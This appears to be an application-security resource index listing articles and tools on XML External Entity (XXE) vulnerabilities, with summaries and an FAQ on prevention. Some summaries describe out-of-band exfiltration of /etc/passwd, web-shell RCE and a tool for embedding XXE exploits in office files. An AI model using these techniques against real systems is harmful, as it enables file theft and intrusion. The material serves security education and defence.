| 2021-05-04 2021 | XXE : From Zero to Hero beginner | This content, "XXE: From Zero to Hero," likely explores the topic of XML External Entity (XXE) vulnerabilities. It probably guides readers from a foundational understanding of XXE to mastering its exploitation and defense. The content could cover how XXE flaws arise from improper XML parsing, their potential impacts (like data exfiltration or denial-of-service), and techniques for identifying and mitigating these vulnerabilities. |
| 2021-01-20 2021 | XXE attacks 😈 beginner | Various file formats such as PDF, Excel, SVG, and ebooks utilize XML and can be susceptible to XXE (XML External Entity) attacks. These attacks involve exploiting vulnerabilities in XML parsers to access sensitive data or execute malicious actions. It is crucial for developers and users to be aware of the risks associated with XXE attacks and implement proper security measures to prevent unauthorized access to data. |
| 2020-01-27 2020 | Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag beginner | The content discusses XXE (XML External Entity Injection) and its exploitation in cybersecurity. XXE is a vulnerability that allows attackers to manipulate XML input to access sensitive data or execute remote code. By injecting malicious entities into XML documents, attackers can exploit vulnerable applications. Understanding XXE is crucial for penetration testing and securing systems against such attacks. The article likely delves into the technical details of XXE exploitation, its impact on security, and strategies to prevent it. |
| 2018-09-13 2018 | XXE - Things Are Getting Out of Band intermediate | Technique detailing out-of-band XXE attacks, leveraging FTP and HTTP handlers for blind exfiltration of sensitive data like `/etc/passwd`. The technique applies to vulnerable Java versions (<1.7 and sometimes >1.7) and can extend to ASP.NET applications for potential RCE via web shell downloads. → blog.zsec.uk |
| 2017-02-07 2017 | Advice From A Researcher: Hunting XXE For Fun and Profit intermediate | The content is titled "Advice From A Researcher: Hunting XXE For Fun and Profit." It likely discusses insights and tips from a researcher on exploiting XML External Entity (XXE) vulnerabilities for both enjoyment and financial gain. The focus is on the process of identifying and exploiting XXE vulnerabilities in systems for various purposes. This content may provide guidance on how to effectively hunt for XXE vulnerabilities and potentially profit from them. |
| 2017-01-31 2017 | BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different intermediate | Tool for embedding XXE/XML exploits into various OXML document file formats including DOCX, XLSX, PPTX, ODT, ODG, ODP, ODS, and SVG. Developed in Ruby using Sinatra, Bootstrap, and Slim, this application facilitates testing XXE vulnerabilities in file upload functionalities, referencing techniques discussed in the BH USA 2015 presentation. |
Frequently Asked Questions
- What is an XXE attack?
- An XML External Entity attack exploits XML parsers that process external entity references. By defining a malicious entity (e.g., referencing file:///etc/passwd), an attacker can read local files, perform SSRF, or cause denial of service through entity expansion (billion laughs attack).
- Where do XXE vulnerabilities appear besides XML APIs?
- XXE can appear in file uploads (DOCX, XLSX, SVG, and PDF files are XML-based), SAML authentication flows, RSS/Atom feed parsers, SOAP web services, and any application that processes XML configuration files — even if it does not explicitly accept XML input.
- How do you prevent XXE?
- Disable external entity resolution and DTD processing in your XML parser. The exact configuration varies by language: in Java, set disallow-doctype-decl; in Python, use defusedxml; in PHP, use libxml_disable_entity_loader. Where possible, use simpler data formats like JSON instead of XML.
Weekly AppSec Digest
Get new resources delivered every Monday.